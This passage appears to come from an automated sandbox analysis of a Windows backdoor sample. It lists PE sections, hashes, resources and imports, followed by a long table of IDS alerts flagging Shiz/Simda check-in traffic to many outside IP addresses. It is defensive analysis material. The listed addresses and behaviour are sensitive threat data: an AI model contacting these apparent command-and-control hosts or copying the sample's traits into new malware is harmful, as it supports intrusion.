                                                                                                                                                                                                              jne 00007F48588C725Dh
                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x71f80xdc.ig
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xe50000xadec.rsrc
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xf00000x36e.reloc
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x6cc5c0x1c.LI
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                              .ZYkKE0x10000x1a9f0x1a9f271cc19fdeee5d95e9758d8f976dfe1fFalse0.7970652971386647data6.397417124781268IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .peSRE0x30000x339a0x34006e0f6cceb67bc2e4e4abe713c2c624c4False0.6909555288461539COM executable for DOS6.060047228899006IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .ig0x70000x43610xe00f4d08e0a40e61eacb8469ba4d5fa6113False0.45591517857142855data4.874628177058625IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .data0xc0000x5f5140x22000ec74f7c616ff52d4f195ea701cd8ed8fFalse0.9882166245404411data7.9817820356059626IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                              .LI0x6c0000x787c30xe00944e23da79393d3719209e04377751b8False0.8130580357142857data6.5278326059652105IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .rsrc0xe50000xadec0xae00d58882b27e7579e4d4637b8cefff2405False0.9572781968390804data7.768024831380774IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .reloc0xf00000x36e0x4007f71000ea8c08019c48bfd973cc55da0False0.859375data6.474763234435723IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                              RT_ICON0xe53dc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6414165103189493
                                                                                                                                                                                                              RT_MENU0xe64840x52dataEnglishUnited States0.9390243902439024
                                                                                                                                                                                                              RT_MENU0xe64d80x2edataEnglishUnited States1.0869565217391304
                                                                                                                                                                                                              RT_DIALOG0xe65080x52dataEnglishUnited States0.975609756097561
                                                                                                                                                                                                              RT_RCDATA0xe655c0x1890dataEnglishUnited States1.0017493638676844
                                                                                                                                                                                                              RT_RCDATA0xe7dec0x29eddataEnglishUnited States1.001024876548961
                                                                                                                                                                                                              RT_RCDATA0xea7dc0x524edataEnglishUnited States1.0007593735168485
                                                                                                                                                                                                              RT_RCDATA0xefa2c0x33dataEnglishUnited States1.2156862745098038
                                                                                                                                                                                                              RT_RCDATA0xefa600x4fdataEnglishUnited States1.139240506329114
                                                                                                                                                                                                              RT_RCDATA0xefab00x57dataEnglishUnited States1.1264367816091954
                                                                                                                                                                                                              RT_RCDATA0xefb080x4bdataEnglishUnited States1.1466666666666667
                                                                                                                                                                                                              RT_RCDATA0xefb540x61dataEnglishUnited States1.1134020618556701
                                                                                                                                                                                                              RT_GROUP_ICON0xefbb80x14dataEnglishUnited States1.1
                                                                                                                                                                                                              RT_VERSION0xefbcc0x220dataEnglishUnited States0.5294117647058824
                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                              KERNEL32.DLLFindAtomA, SetCalendarInfoA, FindResourceA, lstrcmp, GetDateFormatW, SetCurrentDirectoryA, CopyFileA, DisconnectNamedPipe, LoadLibraryA, SuspendThread, GetProcAddress
                                                                                                                                                                                                              user32.dllPostQuitMessage, SetFocus, RemoveMenu, EnumChildWindows, MessageBoxIndirectW, GetDC, LoadMenuW, GetActiveWindow, LoadMenuA, EnumDesktopWindows, RegisterWindowMessageA, GetWindowTextW, EnumDesktopsW, GetClassNameA, LoadCursorA, GetWindowTextA, GetTopWindow, LoadBitmapA, GetMenuInfo, GetCapture, wvsprintfA, SetCursorPos, IsDlgButtonChecked, GetMenuStringW, CheckMenuRadioItem, DestroyWindow, SetActiveWindow, AppendMenuW, GetDlgItemTextW, UpdateLayeredWindow, IsChild, CreateDialogParamW, GetMenuStringA, ShowCaret, GetKeyState, GetCaretPos, GetCapture, CreateWindowExA, CheckDlgButton, GetIconInfo, CopyImage, WinHelpA, CopyIcon, DialogBoxParamA, GetDC
                                                                                                                                                                                                              gdi32.dllGetGlyphIndicesA, GetColorAdjustment, GetTextCharset, GetTextColor, CreatePen, SetSystemPaletteUse, SwapBuffers, GetICMProfileA, GetFontUnicodeRanges, StartPage, CreateDCA, SetWinMetaFileBits
                                                                                                                                                                                                              advapi32.dllRegCreateKeyExA, RegDeleteKeyW, RegEnumValueA, RegOpenKeyExA, RegDeleteValueA, RegCreateKeyExW, RegOpenKeyW
                                                                                                                                                                                                              shell32.dllSHGetDataFromIDListA, SHGetFileInfoW
                                                                                                                                                                                                              shlwapi.dllPathRemoveBlanksW, UrlHashA, PathIsDirectoryEmptyW, StrStrNIW, StrCmpNA, PathIsContentTypeA, PathAppendA, PathRemoveBackslashA, PathSkipRootA, PathGetDriveNumberW, PathSearchAndQualifyW
                                                                                                                                                                                                              ole32.dllCoUninitialize
                                                                                                                                                                                                              INETCOMM.DLLHrGetLastOpenFileDirectory, MimeEditIsSafeToRun, EssSecurityLabelDecodeEx, CreateSMTPTransport, HrDoAttachmentVerb, MimeOleGetDefaultCharset, MimeOleSMimeCapsFull
                                                                                                                                                                                                              oledlg.dllOleUIChangeSourceA, OleUIUpdateLinksW, OleUIConvertW, OleUIObjectPropertiesA, OleUIUpdateLinksA, OleUIBusyA, OleUIPasteSpecialA, OleUIEditLinksW
                                                                                                                                                                                                              crypt32.dllCryptStringToBinaryA, PFXExportCertStore, CertCreateContext, CertGetCRLFromStore, CertFindChainInStore, CertFindAttribute, RegOpenHKCUKeyExU, I_CertUpdateStore, CertGetIntendedKeyUsage, CertDuplicateCRLContext, CryptMsgControl, CryptBinaryToStringA
                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                              EnglishUnited States
                                                                                                                                                                                                              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                                                                                                                                                                              2024-08-23T18:47:41.392344+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15074980192.168.2.464.225.91.73
                                                                                                                                                                                                              2024-08-23T18:47:41.392344+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15074980192.168.2.464.225.91.73
                                                                                                                                                                                                              2024-08-23T18:47:01.589447+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14973580192.168.2.43.64.163.50
                                                                                                                                                                                                              2024-08-23T18:47:01.589447+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14973580192.168.2.43.64.163.50
                                                                                                                                                                                                              2024-08-23T18:47:01.518762+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16020980192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:47:01.518762+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16020980192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:47:41.908933+0200UDP2021022ET MALWARE Wapack Labs Sinkhole DNS Reply153542061.1.1.1192.168.2.4
                                                                                                                                                                                                              2024-08-23T18:47:52.906016+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16428580192.168.2.491.195.240.19
                                                                                                                                                                                                              2024-08-23T18:48:59.720188+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15639380192.168.2.469.162.80.58
                                                                                                                                                                                                              2024-08-23T18:48:59.720188+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15639380192.168.2.469.162.80.58
                                                                                                                                                                                                              2024-08-23T18:47:00.817565+0200UDP2021022ET MALWARE Wapack Labs Sinkhole DNS Reply153539711.1.1.1192.168.2.4
                                                                                                                                                                                                              2024-08-23T18:47:52.139890+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16427680192.168.2.418.208.156.248
                                                                                                                                                                                                              2024-08-23T18:47:52.139890+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16427680192.168.2.418.208.156.248
                                                                                                                                                                                                              2024-08-23T18:49:00.092910+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15639680192.168.2.491.195.240.19
                                                                                                                                                                                                              2024-08-23T18:47:39.077058+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15113080192.168.2.4154.85.183.50
                                                                                                                                                                                                              2024-08-23T18:47:39.077058+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15113080192.168.2.4154.85.183.50
                                                                                                                                                                                                              2024-08-23T18:47:02.071829+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14973680192.168.2.4199.191.50.83
                                                                                                                                                                                                              2024-08-23T18:47:02.071829+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14973680192.168.2.4199.191.50.83
                                                                                                                                                                                                              2024-08-23T18:47:01.728464+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14965180192.168.2.418.208.156.248
                                                                                                                                                                                                              2024-08-23T18:47:01.728464+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14965180192.168.2.418.208.156.248
                                                                                                                                                                                                              2024-08-23T18:48:37.314742+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16430380192.168.2.4154.85.183.50
                                                                                                                                                                                                              2024-08-23T18:48:37.314742+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16430380192.168.2.4154.85.183.50
                                                                                                                                                                                                              2024-08-23T18:47:16.686195+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15111180192.168.2.418.208.156.248
                                                                                                                                                                                                              2024-08-23T18:47:16.686195+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15111180192.168.2.418.208.156.248
                                                                                                                                                                                                              2024-08-23T18:47:41.773244+0200UDP2021022ET MALWARE Wapack Labs Sinkhole DNS Reply153634021.1.1.1192.168.2.4
                                                                                                                                                                                                              2024-08-23T18:47:42.016225+0200UDP2021022ET MALWARE Wapack Labs Sinkhole DNS Reply153565361.1.1.1192.168.2.4
                                                                                                                                                                                                              2024-08-23T18:48:55.045463+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15002780192.168.2.452.34.198.229
                                                                                                                                                                                                              2024-08-23T18:48:55.045463+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15002780192.168.2.452.34.198.229
                                                                                                                                                                                                              2024-08-23T18:47:17.325618+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin151114443192.168.2.4188.114.97.3
                                                                                                                                                                                                              2024-08-23T18:47:54.006576+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin164286443192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:48:56.952582+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14951780192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:48:56.952582+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14951780192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:48:24.434472+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16429080192.168.2.4188.114.97.3
                                                                                                                                                                                                              2024-08-23T18:48:24.434472+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16429080192.168.2.4188.114.97.3
                                                                                                                                                                                                              2024-08-23T18:47:52.643227+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14973680192.168.2.4199.191.50.83
                                                                                                                                                                                                              2024-08-23T18:47:52.643227+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14973680192.168.2.4199.191.50.83
                                                                                                                                                                                                              2024-08-23T18:47:38.147643+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15112580192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:47:38.147643+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15112580192.168.2.444.221.84.105
                                                                                                                                                                                                              2024-08-23T18:48:52.579521+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15011880192.168.2.472.52.179.174
                                                                                                                                                                                                              2024-08-23T18:48:52.579521+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15011880192.168.2.472.52.179.174
                                                                                                                                                                                                              2024-08-23T18:47:02.493738+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14965780192.168.2.4172.234.222.143
                                                                                                                                                                                                              2024-08-23T18:47:02.493738+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14965780192.168.2.4172.234.222.143
                                                                                                                                                                                                              2024-08-23T18:47:44.031380+0200UDP2021022ET MALWARE Wapack Labs Sinkhole DNS Reply153619981.1.1.1192.168.2.4
                                                                                                                                                                                                              2024-08-23T18:47:47.309576+0200TCP2018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz1806380352.34.198.229192.168.2.4
                                                                                                                                                                                                              2024-08-23T18:47:47.309576+0200TCP2037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst1806380352.34.198.229192.168.2.4
                                                                                                                                                                                                              2024-08-23T18:47:01.618857+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14973380192.168.2.4208.100.26.245
                                                                                                                                                                                                              2024-08-23T18:47:01.618857+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14973380192.168.2.4208.100.26.245
                                                                                                                                                                                                              2024-08-23T18:47:51.282502+0200UDP2021022ET MALWARE Wapack Labs Sinkhole DNS Reply153549741.1.1.1192.168.2.4
                                                                                                                                                                                                              2024-08-23T18:49:00.831770+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              2024-08-23T18:49:00.831770+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15638980192.168.2.4199.191.50.83
                                                                                                                                                                                                              2024-08-23T18:47:01.473287+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14973380192.168.2.4208.100.26.245
                                                                                                                                                                                                              2024-08-23T18:47:01.473287+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14973380192.168.2.4208.100.26.245
                                                                                                                                                                                                              2024-08-23T18:48:29.319176+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin164296443192.168.2.4188.114.97.3
                                                                                                                                                                                                              2024-08-23T18:47:02.186519+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14965580192.168.2.469.162.80.60
                                                                                                                                                                                                              2024-08-23T18:47:02.186519+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14965580192.168.2.469.162.80.60
                                                                                                                                                                                                              2024-08-23T18:48:51.934696+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15011780192.168.2.472.52.179.174
                                                                                                                                                                                                              2024-08-23T18:48:51.934696+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15011780192.168.2.472.52.179.174
                                                                                                                                                                                                              2024-08-23T18:48:59.438927+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15639280192.168.2.43.94.10.34
                                                                                                                                                                                                              2024-08-23T18:48:59.438927+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15639280192.168.2.43.94.10.34
                                                                                                                                                                                                              2024-08-23T18:48:58.452086+0200UDP2021022ET MALWARE Wapack Labs Sinkhole DNS Reply153619521.1.1.1192.168.2.4
                                                                                                                                                                                                              2024-08-23T18:47:52.479234+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16428380192.168.2.4172.234.222.143
                                                                                                                                                                                                              2024-08-23T18:47:52.479234+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16428380192.168.2.4172.234.222.143
                                                                                                                                                                                                              2024-08-23T18:47:01.793758+0200TCP2018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz180496523.94.10.34192.168.2.4
                                                                                                                                                                                                              2024-08-23T18:47:01.793758+0200TCP2037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst180496523.94.10.34192.168.2.4
                                                                                                                                                                                                              2024-08-23T18:48:59.360466+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15639180192.168.2.4172.234.222.143
                                                                                                                                                                                                              2024-08-23T18:48:59.360466+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15639180192.168.2.4172.234.222.143
                                                                                                                                                                                                              2024-08-23T18:47:21.509420+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin151121443192.168.2.4188.114.97.3
                                                                                                                                                                                                              2024-08-23T18:49:01.919618+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15639880192.168.2.485.17.31.122
                                                                                                                                                                                                              2024-08-23T18:49:01.919618+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15639880192.168.2.485.17.31.122
                                                                                                                                                                                                              2024-08-23T18:48:36.648362+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16430280192.168.2.4103.224.212.210
                                                                                                                                                                                                              2024-08-23T18:48:36.648362+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16430280192.168.2.4103.224.212.210
                                                                                                                                                                                                              2024-08-23T18:47:03.985127+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14973180192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:47:03.985127+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14973180192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:48:59.281482+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15638880192.168.2.4208.100.26.245
                                                                                                                                                                                                              2024-08-23T18:48:59.281482+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15638880192.168.2.4208.100.26.245
                                                                                                                                                                                                              2024-08-23T18:48:59.413638+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15638880192.168.2.4208.100.26.245
                                                                                                                                                                                                              2024-08-23T18:48:59.413638+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15638880192.168.2.4208.100.26.245
                                                                                                                                                                                                              2024-08-23T18:47:36.458145+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15112280192.168.2.413.248.169.48
                                                                                                                                                                                                              2024-08-23T18:47:36.458145+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15112280192.168.2.413.248.169.48
                                                                                                                                                                                                              2024-08-23T18:47:51.818588+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14973580192.168.2.43.64.163.50
                                                                                                                                                                                                              2024-08-23T18:47:51.818588+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14973580192.168.2.43.64.163.50
                                                                                                                                                                                                              2024-08-23T18:47:42.176201+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15075180192.168.2.472.52.179.174
                                                                                                                                                                                                              2024-08-23T18:47:42.176201+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15075180192.168.2.472.52.179.174
                                                                                                                                                                                                              2024-08-23T18:48:59.323898+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15638380192.168.2.4162.255.119.102
                                                                                                                                                                                                              2024-08-23T18:48:59.323898+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15638380192.168.2.4162.255.119.102
                                                                                                                                                                                                              2024-08-23T18:47:39.441428+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15113080192.168.2.4154.85.183.50
                                                                                                                                                                                                              2024-08-23T18:47:39.441428+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15113080192.168.2.4154.85.183.50
                                                                                                                                                                                                              2024-08-23T18:48:59.921822+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15639580192.168.2.4172.234.222.143
                                                                                                                                                                                                              2024-08-23T18:48:59.921822+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15639580192.168.2.4172.234.222.143
                                                                                                                                                                                                              2024-08-23T18:47:52.202984+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16427380192.168.2.4162.255.119.102
                                                                                                                                                                                                              2024-08-23T18:47:52.202984+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16427380192.168.2.4162.255.119.102
                                                                                                                                                                                                              2024-08-23T18:47:01.520199+0200TCP2018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz1806020944.221.84.105192.168.2.4
                                                                                                                                                                                                              2024-08-23T18:47:01.520199+0200TCP2037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst1806020944.221.84.105192.168.2.4
                                                                                                                                                                                                              2024-08-23T18:47:52.358805+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin164278443192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:48:51.936053+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15011680192.168.2.464.225.91.73
                                                                                                                                                                                                              2024-08-23T18:48:51.936053+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15011680192.168.2.464.225.91.73
                                                                                                                                                                                                              2024-08-23T18:47:53.392700+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14973180192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:47:53.392700+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14973180192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:47:38.393681+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15112880192.168.2.4103.224.182.252
                                                                                                                                                                                                              2024-08-23T18:47:38.393681+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15112880192.168.2.4103.224.182.252
                                                                                                                                                                                                              2024-08-23T18:47:16.822889+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14966380192.168.2.4188.114.97.3
                                                                                                                                                                                                              2024-08-23T18:47:16.822889+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14966380192.168.2.4188.114.97.3
                                                                                                                                                                                                              2024-08-23T18:47:51.597286+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14973580192.168.2.43.64.163.50
                                                                                                                                                                                                              2024-08-23T18:47:51.597286+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14973580192.168.2.43.64.163.50
                                                                                                                                                                                                              2024-08-23T18:47:04.530284+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin149661443192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:47:01.778689+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14973580192.168.2.43.64.163.50
                                                                                                                                                                                                              2024-08-23T18:47:01.778689+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14973580192.168.2.43.64.163.50
                                                                                                                                                                                                              2024-08-23T18:48:11.489069+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16428480192.168.2.45.79.71.225
                                                                                                                                                                                                              2024-08-23T18:48:11.489069+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16428480192.168.2.45.79.71.225
                                                                                                                                                                                                              2024-08-23T18:47:20.835861+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14966380192.168.2.4188.114.97.3
                                                                                                                                                                                                              2024-08-23T18:47:20.835861+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14966380192.168.2.4188.114.97.3
                                                                                                                                                                                                              2024-08-23T18:48:36.316287+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16430080192.168.2.464.225.91.73
                                                                                                                                                                                                              2024-08-23T18:48:36.316287+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16430080192.168.2.464.225.91.73
                                                                                                                                                                                                              2024-08-23T18:47:52.143521+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16427780192.168.2.43.94.10.34
                                                                                                                                                                                                              2024-08-23T18:47:52.143521+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16427780192.168.2.43.94.10.34
                                                                                                                                                                                                              2024-08-23T18:48:24.867558+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16429280192.168.2.4103.150.11.230
                                                                                                                                                                                                              2024-08-23T18:48:24.867558+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16429280192.168.2.4103.150.11.230
                                                                                                                                                                                                              2024-08-23T18:47:01.793323+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14965280192.168.2.43.94.10.34
                                                                                                                                                                                                              2024-08-23T18:47:01.793323+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14965280192.168.2.43.94.10.34
                                                                                                                                                                                                              2024-08-23T18:49:01.437661+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin156397443192.168.2.4188.114.96.3
                                                                                                                                                                                                              2024-08-23T18:47:41.579995+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15075080192.168.2.472.52.179.174
                                                                                                                                                                                                              2024-08-23T18:47:41.579995+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15075080192.168.2.472.52.179.174
                                                                                                                                                                                                              2024-08-23T18:48:59.222909+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin15638480192.168.2.43.64.163.50
                                                                                                                                                                                                              2024-08-23T18:48:59.222909+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin15638480192.168.2.43.64.163.50
                                                                                                                                                                                                              2024-08-23T18:47:51.662556+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin14973380192.168.2.4208.100.26.245
                                                                                                                                                                                                              2024-08-23T18:47:51.662556+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin14973380192.168.2.4208.100.26.245
                                                                                                                                                                                                              2024-08-23T18:47:51.953230+0200TCP2803437ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin16427180192.168.2.4172.234.222.143
                                                                                                                                                                                                              2024-08-23T18:47:51.953230+0200TCP2804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin16427180192.168.2.4172.234.222.143
